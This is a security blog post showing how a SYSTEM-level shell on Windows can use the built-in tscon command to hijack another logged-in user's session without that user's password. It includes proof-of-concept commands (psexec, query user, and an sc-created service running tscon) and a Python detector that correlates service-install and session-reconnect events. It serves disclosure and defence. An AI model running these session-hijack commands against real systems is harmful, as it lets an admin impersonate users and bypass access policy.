0-day or Feature? Privilege Escalation / Session Hijacking All Windows versions
Blog post in 20 seconds: fun with a sethc-backdoored host 🙂 somewhere on the internet:
Recently I've played with sethc/utilman logon screen backdoors, and almost every time I used just the command line.
Occasionally I've looked at the Users tab in Task Manager (taskmgr.exe), clicked the Connect button, and surprisingly I got connected to the selected user's session.
When I checked it again with local admin rights, it failed by asking for the user's password.
Why and how did that happen? Let's dig deeper.
In the Microsoft documentation for tscon we can see a couple of important remarks:
You must have Full Control access permission or Connect special access permission to connect to another session.
The /dest:<SessionName> parameter allows you to connect the session of another user to a different session.
If you do not specify a password in the <Password> parameter, and the target session belongs to a user other than the current one, tscon fails (not really).
I've got it! Sticky Keys (cmd backdoor) at the Windows login screen runs as NT AUTHORITY\SYSTEM, has the Full Control access permission, and can connect to EVERY user session without asking for a password.
A privileged user who can gain command execution with NT AUTHORITY\SYSTEM rights can hijack any currently logged-in user's session, without any knowledge of that user's credentials.
A Terminal Services session can be either in the connected or the disconnected state; a locked workstation or a closed RDP window leaves the session disconnected, but still logged in.
Suppose a bank employee has access to a billing system, and the credentials to log in to it.
One day he comes to work, logs in to the billing system and starts working. At lunchtime he locks his workstation and goes out to lunch.
Then a system administrator comes to the employee's workstation and logs in with his administrator account.
According to the bank's policy, the administrator account should not have access to the billing system, but with a couple of built-in Windows commands this system administrator can hijack the employee's desktop, which was left locked. From then on, the sysadmin can perform malicious actions in the billing system under the billing employee's account.
There is a huge number of scenarios like this.
Furthermore, an attacker doesn't need tools like Metasploit, Incognito, Mimikatz etc., which are commonly used for token manipulation and impersonating logged-in users. Everything is done with built-in commands. Every admin can impersonate any logged-in user, either locally with physical access or remotely via Remote Desktop (see PoC).
Feature/vulnerability tested on:
Windows 2012 R2
Proof of Concept:
1. Get a SYSTEM shell and list the sessions:
psexec -s \\localhost cmd

C:\Windows\system32>query user
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 administrator                             1  Disc            1  3/12/2017 3:07 PM
>localadmin            rdp-tcp#55          2  Active          .  3/12/2017 3:10 PM

C:\Windows\system32>
2. Create a service which will hijack the user's session:
C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
[SC] CreateService SUCCESS

C:\Windows\system32>net start sesshijack
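From the defender's side, the service-based variant above leaves a clear trail: a new service (System log event 7045) whose binary path runs tscon with /dest:, followed shortly by a session reconnect (Security log event 4778) for the targeted session name. The following Python is an added detection example, not code from the original post; the events are constructed samples with SIEM-style normalised field names (time, id, service_name, image_path, account, session_name, client_name), not Microsoft's raw event format.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (not real Windows log output), modelled on the PoC:
# a 7045 service install wrapping tscon, the 4778 reconnect it causes, and a benign 7045.
SAMPLE_EVENTS = [
    {"time": "2017-03-12 15:09:50", "id": 7045, "service_name": "sesshijack",
     "image_path": 'cmd.exe /k tscon 1 /dest:rdp-tcp#55', "account": "LocalSystem"},
    {"time": "2017-03-12 15:09:58", "id": 4778, "account": "administrator",
     "session_name": "rdp-tcp#55", "client_name": "WS01"},
    {"time": "2017-03-12 15:20:00", "id": 7045, "service_name": "BackupSvc",
     "image_path": r"C:\Program Files\Backup\svc.exe", "account": "LocalSystem"},
]

# tscon <session id> /dest:<session name>, with or without a cmd.exe /k wrapper
TSCON_RE = re.compile(r"\btscon(\.exe)?\b\s+\S+\s+/dest:", re.IGNORECASE)
WINDOW = timedelta(seconds=60)  # how soon after service creation a reconnect counts


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def detect_session_hijack(events):
    """Return one alert per service install that runs tscon /dest:.

    The 7045 alone is 'high' (no legitimate service should reconnect sessions);
    a 4778 reconnect for the same session name within WINDOW raises it to 'critical'.
    """
    alerts = []
    suspects = [e for e in events if e["id"] == 7045 and TSCON_RE.search(e["image_path"])]
    for s in suspects:
        t0 = parse_time(s["time"])
        target = s["image_path"].split("/dest:", 1)[1].split()[0]  # e.g. rdp-tcp#55
        confirmed = any(
            e["id"] == 4778
            and e["session_name"].lower() == target.lower()
            and 0 <= (parse_time(e["time"]) - t0).total_seconds() <= WINDOW.total_seconds()
            for e in events
        )
        alerts.append({"service": s["service_name"], "image_path": s["image_path"],
                       "dest_session": target,
                       "severity": "critical" if confirmed else "high"})
    return alerts


if __name__ == "__main__":
    for alert in detect_session_hijack(SAMPLE_EVENTS):
        print(alert)
```

The same tscon pattern is worth matching on process creation events (4688 or Sysmon 1) as well, since the Task Manager and plain command-line variants never create a service.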
Proof of Concept video:
Windows 7 via Task Manager:
Windows 7 via command line:
Windows 2012 R2 via service creation:
Update: If you still think this doesn't have high attack value, read the great writeup by Kevin Beaumont about this feature:
Update: RedSnarf now has support for RDP hijacking: https://www.youtube.com/watch?v=VrF8uXK_ePY